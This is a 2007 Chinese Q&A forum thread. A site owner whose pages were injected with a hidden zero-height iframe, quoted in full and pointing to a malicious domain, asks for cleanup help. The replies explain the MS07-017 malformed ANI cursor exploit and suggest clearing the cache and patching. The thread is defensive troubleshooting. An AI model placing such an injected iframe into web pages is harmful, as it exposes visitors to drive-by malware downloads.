我的网页文件里有Hack.SuspiciousAni病毒!!

我的网页源文件里有Hack.SuspiciousAni病毒,
1、网页中许多页面的</html> 后面有 <iframe src=http://w.mh8888.cn/ad.htm?m width=100 height=0 frameborder=0></iframe> 这个代码,应该就是这个;去了以后网站有些东西会显示不正常;
2、连接数据库,为什么连接的是Datashop.asp而非Datashop.mdb呢?Datashop.asp里也有<iframe....代码,不过显示的是乱码;

安的是瑞星的话,会提示:
C:\Documents and Settings\new\Local Settings\Temporary Internet Files\Content.IE5\09AB0XUN\xjz2007[1].bmp 是病毒文件;
类型是:Hack.SuspiciousAni

哪位遇到过这情况?知道解决方法的告诉一声,先谢了/
QQ:86537568
手机:就不说了吧...
下面的那个大哥说得很准,不过只问了病毒的表现和原理,没有说解决方法呵??我要解决方法.服务器上的网站文件的处理;
关于<iframe src=http://** ... /iframe>的问题,我都清理了,可有的数据库不能访问了,现在要解决的问题是这个.
有达人没啊?帮个忙呵

第1个回答  2007-06-16
数据库的后缀名可以改的,改成ASP主要是为了防止下载的!你看看是不是你的链接数据库的文件出了问题,还是后缀名不符!
第2个回答  2007-06-22
转自卡卡论坛:

近段时间,看到社区上不少会员因此而不知所措,不得不简要说明一下。希望以后再因此求助的会员,会自己动手搜索一下,看到这个帖子,也就不用再惊慌了。

所谓Hack.SuspiciousAni,其实就是利用微软MS07-017中的动态光标处理漏洞的畸形ANI文件,一般由被挂马的网页的相关恶意代码下载。
该漏洞存在于系统关键文件user32.dll中。当用户进入带有相关恶意代码的网页时,浏览器将会把这种畸形ANI文件下载到本机临时文件夹中,并依照网页脚本执行,将其设置为浏览此页面时鼠标的光标图案。如果这整个过程完成,则对于没有打上MS07-017补丁的电脑,此漏洞将被触发,黑客将可远程执行任意代码(一般是下载木马)。

针对此情况,瑞星把这种畸形ANI文件列入查杀范围,命名Hack.SuspiciousAni。

有了瑞星监控的电脑上,当用户的浏览器打开带有相关恶意代码的网页,将畸形ANI文件下载到本机临时文件夹中时,瑞星文件监控和(或)网页监控将报警,提示发现Hack.SuspiciousAni。由于该文件正被浏览器调用,瑞星一般将跳过相关代码并提示用户必须“重启电脑后删除文件”。这样畸形ANI文件将不起作用,也就不会下载真正的病毒木马了。

然而就因为“重启后删除”这个提示,有可能会令不明就理的用户们十分紧张。因为他们会发现,重启后再扫描时,瑞星仍然会提示……

其实处理方法非常简单:
关闭浏览器,然后清空IE临时文件夹。

另外,由于MS07-017漏洞目前被黑客在网页挂马上利用得比较频繁,强烈建议用户到windows update上打上相关补丁,补丁详情可参考http://forum.ikaka.com/topic.asp?board=28&artid=8292648或直接参考http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx

问:清空IE临时文件夹就可以解决了吗?如果再次打开相同网站也不会感染了?

回复:
首先,其实不能称为“感染”,因为如果这个畸形ANI文件被瑞星拦截而乖乖地“躺”在IE临时文件夹里,是完全不会对系统产生实质性危害的。
其次,那个网站既然被黑客挂了恶意代码,如果打开时瑞星不报警,那才是瑞星的“失职”。既然知道了打开的网站是被挂了恶意代码,在恶意代码被清除之前,当然应该避免再上这个网站了。
很多会员之所以“恐慌”,这也是个重要原因。第一次进,瑞星报警杀了,没有再注意,第二次进,瑞星再次报警杀了,于是就紧张起来了。“瑞星杀不掉它?!”这属于理解错误。这种情况不是“中了杀不掉”,而是“杀掉了,你又去中”,属于“重复中毒”,而不属于“顽固型病毒”。本回答被提问者采纳
相似回答